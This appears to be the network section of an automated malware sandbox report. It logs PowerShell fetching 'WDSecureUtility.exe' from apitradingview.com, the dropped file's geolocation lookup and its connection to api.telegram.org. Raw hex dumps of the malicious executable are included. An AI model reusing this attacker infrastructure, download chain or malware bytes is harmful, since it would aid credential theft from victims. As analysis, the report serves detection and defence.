                                                            Nov 4, 2024 09:42:19.110037088 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.151238918 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.151256084 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.151357889 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.151379108 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.151449919 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.232417107 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.232434988 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.232544899 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.232568979 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.232656002 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.354371071 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.354398966 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.354465008 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.354492903 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.354518890 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.354600906 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.476677895 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.476703882 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.476783037 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.476815939 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.476869106 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.563097954 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.563124895 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.563275099 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.563303947 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.563378096 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.599303007 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.599345922 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.599512100 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.599513054 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.599545002 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.599602938 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.720149040 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.720267057 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.720304012 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.720331907 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.720347881 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.720350981 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.720402002 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.720410109 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.770797014 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.807410002 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.807483912 CET | 443 | 49705 | 86.104.15.60 | 192.168.2.8
                                                            Nov 4, 2024 09:42:19.807514906 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.807564974 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:19.822011948 CET | 49705 | 443 | 192.168.2.8 | 86.104.15.60
                                                            Nov 4, 2024 09:42:20.659645081 CET | 49706 | 443 | 192.168.2.8 | 172.67.70.233
                                                            Nov 4, 2024 09:42:20.659686089 CET | 443 | 49706 | 172.67.70.233 | 192.168.2.8
                                                            Nov 4, 2024 09:42:20.659745932 CET | 49706 | 443 | 192.168.2.8 | 172.67.70.233
                                                            Nov 4, 2024 09:42:20.665431023 CET | 49706 | 443 | 192.168.2.8 | 172.67.70.233
                                                            Nov 4, 2024 09:42:20.665446997 CET | 443 | 49706 | 172.67.70.233 | 192.168.2.8
                                                            Nov 4, 2024 09:42:21.282097101 CET | 443 | 49706 | 172.67.70.233 | 192.168.2.8
                                                            Nov 4, 2024 09:42:21.282160044 CET | 49706 | 443 | 192.168.2.8 | 172.67.70.233
                                                            Nov 4, 2024 09:42:21.285916090 CET | 49706 | 443 | 192.168.2.8 | 172.67.70.233
                                                            Nov 4, 2024 09:42:21.285929918 CET | 443 | 49706 | 172.67.70.233 | 192.168.2.8
                                                            Nov 4, 2024 09:42:21.286176920 CET | 443 | 49706 | 172.67.70.233 | 192.168.2.8
                                                            Nov 4, 2024 09:42:21.333233118 CET | 49706 | 443 | 192.168.2.8 | 172.67.70.233
                                                            Nov 4, 2024 09:42:21.335386038 CET | 49706 | 443 | 192.168.2.8 | 172.67.70.233
                                                            Nov 4, 2024 09:42:21.383332014 CET | 443 | 49706 | 172.67.70.233 | 192.168.2.8
                                                            Nov 4, 2024 09:42:21.507430077 CET | 443 | 49706 | 172.67.70.233 | 192.168.2.8
                                                            Nov 4, 2024 09:42:21.507558107 CET | 443 | 49706 | 172.67.70.233 | 192.168.2.8
                                                            Nov 4, 2024 09:42:21.507618904 CET | 49706 | 443 | 192.168.2.8 | 172.67.70.233
                                                            Nov 4, 2024 09:42:21.509412050 CET | 49706 | 443 | 192.168.2.8 | 172.67.70.233
                                                            Nov 4, 2024 09:42:25.115395069 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:25.115463018 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:25.115542889 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:25.116070986 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:25.116092920 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:25.951282978 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:25.951371908 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:25.957879066 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:25.957899094 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:25.958167076 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:25.965210915 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.011332035 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.202136993 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.203299046 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.203341007 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.203552008 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.203572989 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.203682899 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.203764915 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.203859091 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.203871965 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.203876019 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.203888893 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.203967094 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.203983068 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.203988075 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.203999043 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.204049110 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.204058886 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.204144001 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.204159021 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.204166889 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.204171896 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.204194069 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.204201937 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.204272032 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.204279900 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.204288960 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.204299927 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.204334974 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:26.204343081 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:26.958368063 CET | 443 | 49707 | 149.154.167.220 | 192.168.2.8
                                                            Nov 4, 2024 09:42:27.005130053 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Nov 4, 2024 09:42:27.054579020 CET | 49707 | 443 | 192.168.2.8 | 149.154.167.220
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Nov 4, 2024 09:42:16.966223001 CET | 51809 | 53 | 192.168.2.8 | 1.1.1.1
                                                            Nov 4, 2024 09:42:16.978624105 CET | 53 | 51809 | 1.1.1.1 | 192.168.2.8
                                                            Nov 4, 2024 09:42:20.639375925 CET | 52419 | 53 | 192.168.2.8 | 1.1.1.1
                                                            Nov 4, 2024 09:42:20.646306992 CET | 53 | 52419 | 1.1.1.1 | 192.168.2.8
                                                            Nov 4, 2024 09:42:25.107636929 CET | 57763 | 53 | 192.168.2.8 | 1.1.1.1
                                                            Nov 4, 2024 09:42:25.114737034 CET | 53 | 57763 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 4, 2024 09:42:16.966223001 CET | 192.168.2.8 | 1.1.1.1 | 0xd7c5 | Standard query (0) | apitradingview.com | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:42:20.639375925 CET | 192.168.2.8 | 1.1.1.1 | 0xe4da | Standard query (0) | get.geojs.io | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:42:25.107636929 CET | 192.168.2.8 | 1.1.1.1 | 0x9c9c | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 4, 2024 09:42:16.978624105 CET | 1.1.1.1 | 192.168.2.8 | 0xd7c5 | No error (0) | apitradingview.com | | 86.104.15.60 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:42:20.646306992 CET | 1.1.1.1 | 192.168.2.8 | 0xe4da | No error (0) | get.geojs.io | | 172.67.70.233 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:42:20.646306992 CET | 1.1.1.1 | 192.168.2.8 | 0xe4da | No error (0) | get.geojs.io | | 104.26.1.100 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:42:20.646306992 CET | 1.1.1.1 | 192.168.2.8 | 0xe4da | No error (0) | get.geojs.io | | 104.26.0.100 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 09:42:25.114737034 CET | 1.1.1.1 | 192.168.2.8 | 0x9c9c | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                            • apitradingview.com
                                                            • get.geojs.io
                                                            • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 86.104.15.60 | 443 | 7300 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-04 08:42:17 UTC | 182 | OUT | GET /WDSecureUtility.exe HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: apitradingview.com
                                                            Connection: Keep-Alive
2024-11-04 08:42:18 UTC | 404 | IN | HTTP/1.1 200 OK
                                                            Connection: close
                                                            content-type: application/x-msdownload
                                                            last-modified: Wed, 23 Oct 2024 17:12:35 GMT
                                                            accept-ranges: bytes
                                                            content-length: 240640
                                                            date: Mon, 04 Nov 2024 08:42:18 GMT
                                                            server: LiteSpeed
                                                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                            2024-11-04 08:42:18 UTC964INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 28 19 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 00 02 00 00 aa 01 00 00 00 00 00 de 1f 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL(g0 @ `
                                                            2024-11-04 08:42:18 UTC14994INData Raw: 00 00 0a 02 7b 10 00 00 0a 06 7b 10 00 00 0a 6f 09 00 00 0a 2a 16 2a 17 2a d2 20 28 f6 09 9f 20 29 55 55 a5 5a 28 06 00 00 0a 02 7b 0f 00 00 0a 6f 0a 00 00 0a 58 20 29 55 55 a5 5a 28 08 00 00 0a 02 7b 10 00 00 0a 6f 0b 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72 4d 00 00 70 18 8d 01 00 00 01 25 16 02 7b 0f 00 00 0a 0a 12 00 25 71 04 00 00 1b 8c 04 00 00 1b 2d 04 26 14 2b 0b fe 16 04 00 00 1b 6f 0c 00 00 0a a2 25 17 02 7b 10 00 00 0a 0b 12 01 25 71 05 00 00 1b 8c 05 00 00 1b 2d 04 26 14 2b 0b fe 16 05 00 00 1b 6f 0c 00 00 0a a2 28 0d 00 00 0a 2a 1e 02 7b 11 00 00 0a 2a 1e 02 7b 12 00 00 0a 2a 56 02 28 04 00 00 0a 02 03 7d 11 00 00 0a 02 04 7d 12 00 00 0a 2a 13 30 03 00 41 00 00 00 04 00 00 11 03 75 07 00 00 1b 0a 02 06 2e 34 06 2c 2f 28
                                                            Data Ascii: {{o*** ( )UUZ({oX )UUZ({oX*0brMp%{%q-&+o%{%q-&+o(*{*{*V(}}*0Au.4,/(
                                                            2024-11-04 08:42:18 UTC16384INData Raw: 25 80 5c 00 00 04 28 14 00 00 2b 7e 5d 00 00 04 25 2d 17 26 7e 58 00 00 04 fe 06 a5 00 00 06 73 a7 00 00 0a 25 80 5d 00 00 04 28 15 00 00 2b 28 16 00 00 2b 0d 09 2d 02 14 2a 09 72 d8 4d 00 70 28 43 02 00 06 14 6f 33 00 00 0a 0d 09 18 18 6f a9 00 00 0a 20 03 02 00 00 28 aa 00 00 0a 18 5a 13 04 09 1c 11 04 6f a9 00 00 0a 13 05 09 6f 42 00 00 0a 1c 11 04 58 1f 24 58 59 13 06 09 1c 11 04 58 1a 58 11 06 58 6f ab 00 00 0a 13 07 08 6f 24 02 00 06 7e 5e 00 00 04 25 2d 17 26 7e 58 00 00 04 fe 06 a6 00 00 06 73 a5 00 00 0a 25 80 5e 00 00 04 28 14 00 00 2b 7e 5f 00 00 04 25 2d 17 26 7e 58 00 00 04 fe 06 a7 00 00 06 73 a7 00 00 0a 25 80 5f 00 00 04 28 15 00 00 2b 28 16 00 00 2b 13 08 11 08 2d 02 14 2a 11 08 72 d8 4d 00 70 28 43 02 00 06 14 6f 33 00 00 0a 13 08 11 08
                                                            Data Ascii: %\(+~]%-&~Xs%](+(+-*rMp(Co3o (ZooBX$XYXXXoo$~^%-&~Xs%^(+~_%-&~Xs%_(+(+-*rMp(Co3
                                                            2024-11-04 08:42:18 UTC16384INData Raw: 25 2d 18 26 06 06 fe 06 84 01 00 06 73 7a 01 00 0a 25 13 06 7d f4 00 00 04 11 06 28 32 00 00 2b 6f 7b 01 00 0a 13 05 2b 2e 11 05 6f 7c 01 00 0a 13 07 11 04 6f ee 00 00 0a 11 04 6f ed 00 00 0a 12 07 28 67 01 00 0a 12 07 28 69 01 00 0a 73 5b 01 00 06 13 08 de 3e 11 05 6f 78 00 00 0a 2d c9 de 0c 11 05 2c 07 11 05 6f 3b 00 00 0a dc 12 03 28 7d 01 00 0a 3a 6b ff ff ff de 0e 12 03 fe 16 44 00 00 1b 6f 3b 00 00 0a dc 12 09 fe 15 5f 00 00 02 11 09 2a 11 08 2a 00 00 01 1c 00 00 02 00 a1 00 3b dc 00 0c 00 00 00 00 02 00 5a 00 9c f6 00 0e 00 00 00 00 1b 30 04 00 9f 00 00 00 60 00 00 11 73 85 01 00 06 0a 06 02 7d f5 00 00 04 06 7b f5 00 00 04 28 75 01 00 06 28 33 00 00 2b 0b 07 06 7b f6 00 00 04 25 2d 16 26 06 06 fe 06 86 01 00 06 73 7e 01 00 0a 25 0d 7d f6 00 00 04
                                                            Data Ascii: %-&sz%}(2+o{+.o|oo(g(is[>ox-,o;(}:kDo;_**;Z0`s}{(u(3+{%-&s~%}
                                                            2024-11-04 08:42:18 UTC16384INData Raw: 00 00 0a 2a 2e 72 e5 87 00 70 80 78 01 00 04 2a 00 00 50 4b 01 02 17 0b 14 00 00 01 02 03 04 06 08 08 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 50 4b 06 06 50 4b 03 04 14 00 50 4b 05 06 00 00 00 00 50 4b 06 07 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 5c 64 00 00 23 7e 00 00 c8 64 00 00 e8 2f 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 b0 94 00 00 08 88 00 00 23 55 53 00 b8 1c 01 00 10 00 00 00 23 47 55 49 44 00 00 00 c8 1c 01 00 28 26 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 0a 57 bf a2 3f 09 1e 00 00 00 fa 01 33 00 16 c4 00 01 00 00 00 b0 00 00 00 a5 00 00 00 78 01 00 00 45 02 00 00 4f 02 00 00 0c 00 00 00 24 02 00 00 5b 00 00 00 e2 00 00 00 12 00 00 00 03 00 00 00 8c 00 00 00 21
                                                            Data Ascii: *.rpx*PKPKPKPKPKBSJBv4.0.30319l\d#~d/#Strings#US#GUID(&#BlobW?3xEO$[!
                                                            2024-11-04 08:42:18 UTC16384INData Raw: 7d 1c 00 00 02 00 b2 26 00 00 03 00 95 1a 00 00 04 00 f9 28 00 00 01 00 06 2a 00 00 01 00 f9 28 00 00 02 00 28 10 00 00 01 00 ba 28 00 20 02 00 d0 2e 00 00 03 00 0b 2c 00 00 04 00 02 2c 00 00 05 00 ef 29 00 00 06 00 b2 26 00 00 01 00 ba 28 00 20 02 00 d0 2e 00 00 03 00 0b 2c 00 00 04 00 02 2c 00 00 05 00 ef 29 00 00 06 00 b2 26 00 00 07 00 95 1a 00 00 08 00 f9 28 00 00 01 00 ef 29 00 00 02 00 06 2a 00 00 01 00 f9 28 00 00 02 00 28 10 00 00 01 00 ba 28 00 20 02 00 d0 2e 00 00 03 00 fa 2b 00 00 04 00 f2 2b 00 00 05 00 aa 26 00 00 01 00 ba 28 00 20 02 00 d0 2e 00 00 03 00 fa 2b 00 00 04 00 f2 2b 00 00 05 00 aa 26 00 00 06 00 95 1a 00 00 07 00 f9 28 00 00 01 00 06 2a 00 00 01 00 f9 28 00 00 02 00 28 10 00 00 01 00 7d 1c 00 00 02 00 9c 2d 00 20 03 00 27 14 02
                                                            Data Ascii: }&(*((( .,,)&( .,,)&()*((( .++&( .++&(*((}- '
                                                            2024-11-04 08:42:18 UTC16384INData Raw: 6d 6f 6c 65 6b 00 42 61 72 79 66 65 6c 65 66 61 78 6f 6b 00 4e 69 76 6f 76 6f 6b 75 78 6f 62 69 6e 79 68 75 6b 00 41 6c 6c 6f 63 48 47 6c 6f 62 61 6c 00 46 72 65 65 48 47 6c 6f 62 61 6c 00 4d 61 72 73 68 61 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 4e 79 6c 69 74 69 6a 79 73 61 6d 6f 66 69 6c 00 4b 61 70 79 63 69 74 6f 74 75 78 69 6c 00 4b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 75 73 65 72 33 32 2e 64 6c 6c 00 6e 74 64 6c 6c 2e 64 6c 6c 00 72 73 74 72 74 6d 67 72 2e 64 6c 6c 00 4b 69 6c 6c 00 53 79 73 74 65 6d 2e 58 6d 6c 00 73 65 74 5f 53 65 63 75 72 69 74 79 50 72 6f 74 6f 63 6f 6c 00 75 72 6c 00 67 65 74 5f 42 61 73 65 53 74 72 65 61 6d 00 44 65 66 6c 61 74 65 53 74 72 65 61 6d 00 4e 65
                                                            Data Ascii: molekBaryfelefaxokNivovokuxobinyhukAllocHGlobalFreeHGlobalMarshalSystem.ComponentModelNylitijysamofilKapycitotuxilKernel32.dllkernel32.dlluser32.dllntdll.dllrstrtmgr.dllKillSystem.Xmlset_SecurityProtocolurlget_BaseStreamDeflateStreamNe
                                                            2024-11-04 08:42:19 UTC16384INData Raw: 00 44 00 51 00 41 00 56 00 42 00 67 00 4d 00 4e 00 48 00 56 00 68 00 61 00 45 00 31 00 41 00 66 00 45 00 77 00 34 00 59 00 43 00 41 00 77 00 50 00 41 00 52 00 73 00 47 00 42 00 68 00 73 00 3d 00 00 11 64 00 6b 00 45 00 4d 00 58 00 67 00 6f 00 3d 00 00 59 55 00 46 00 34 00 65 00 55 00 42 00 63 00 42 00 44 00 78 00 38 00 47 00 42 00 77 00 30 00 51 00 45 00 41 00 77 00 45 00 45 00 46 00 39 00 54 00 48 00 46 00 6f 00 58 00 44 00 41 00 63 00 57 00 43 00 41 00 63 00 43 00 46 00 41 00 59 00 4b 00 43 00 68 00 6b 00 3d 00 00 21 63 00 30 00 45 00 58 00 46 00 6a 00 34 00 4d 00 42 00 78 00 67 00 4f 00 44 00 77 00 3d 00 3d 00 00 59 55 00 6c 00 30 00 63 00 57 00 68 00 6f 00 41 00 44 00 78 00 30 00 4a 00 43 00 77 00 63 00 55 00 45 00 41 00 30 00 4a 00 45 00 6c 00 70 00
                                                            Data Ascii: DQAVBgMNHVhaE1AfEw4YCAwPARsGBhs=dkEMXgo=YUF4eUBcBDx8GBw0QEAwEEF9THFoXDAcWCAcCFAYKChk=!c0EXFj4MBxgODw==YUl0cWhoADx0JCwcUEA0JElp
                                                            2024-11-04 08:42:19 UTC16384INData Raw: 00 00 21 55 00 31 00 30 00 4c 00 52 00 68 00 38 00 43 00 48 00 44 00 38 00 44 00 42 00 77 00 73 00 3d 00 00 09 62 00 77 00 59 00 3d 00 00 09 44 00 51 00 3d 00 3d 00 00 61 5a 00 48 00 45 00 30 00 63 00 7a 00 41 00 33 00 52 00 56 00 74 00 43 00 4c 00 44 00 77 00 2b 00 4f 00 30 00 6b 00 38 00 48 00 46 00 6b 00 48 00 53 00 6d 00 6b 00 6c 00 43 00 67 00 45 00 55 00 44 00 53 00 6b 00 42 00 48 00 77 00 49 00 62 00 42 00 42 00 6c 00 62 00 55 00 51 00 6f 00 3d 00 00 51 5a 00 48 00 45 00 30 00 63 00 7a 00 41 00 33 00 52 00 56 00 74 00 43 00 4c 00 44 00 77 00 2b 00 4f 00 30 00 6b 00 38 00 48 00 46 00 6b 00 48 00 53 00 6d 00 6b 00 6a 00 45 00 51 00 6f 00 53 00 42 00 78 00 6b 00 64 00 48 00 67 00 51 00 3d 00 00 61 5a 00 48 00 45 00 30 00 63 00 7a 00 41 00 33 00 52 00
                                                            Data Ascii: !U10LRh8CHD8DBws=bwY=DQ==aZHE0czA3RVtCLDw+O0k8HFkHSmklCgEUDSkBHwIbBBlbUQo=QZHE0czA3RVtCLDw+O0k8HFkHSmkjEQoSBxkdHgQ=aZHE0czA3R
                                                            2024-11-04 08:42:19 UTC16384INData Raw: 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 0e 0e 0e 0e 2d 06 15 12 80 8d 02 15 12 20 02 15 12 1c 02 15 12 18 02 15 12 14 02 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 0e 0e 0e 0e 12 82 5c 06 15 12 08 02 0e 0e 09 20 01 15 12 08 02 0e 0e 0e 0b 15 12 0c 02 15 12 08 02 0e 0e 0e 13 20 01 15 12 0c 02 15 12 08 02 0e 0e 0e 15 12 08 02 0e 0e 10 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 1d 20 01 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 15 12 0c 02 15 12 08 02 0e 0e 0e 15 15 12 14 02 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 0e 27 20 01 15 12 14 02 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 0e 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 1a 15 12 18 02 15 12 14 02 15 12 10 02 15 12 0c 02 15 12 08 02 0e 0e 0e 0e 0e 0e 31 20 01 15 12 18 02 15
                                                            Data Ascii: - \ ' 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49706 | 172.67.70.233 | 443 | 7560 | C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-04 08:42:21 UTC | 76 | OUT | GET /v1/ip/geo.json HTTP/1.1
                                                            Host: get.geojs.io
                                                            Connection: Keep-Alive
2024-11-04 08:42:21 UTC | 1101 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 04 Nov 2024 08:42:21 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-request-id: 9ada6b320ca7dea66c4b7802d777725a-ASH
                                                            strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                            access-control-allow-origin: *
                                                            access-control-allow-methods: GET
                                                            pragma: no-cache
                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            geojs-backend: ash-01
                                                            cf-cache-status: DYNAMIC
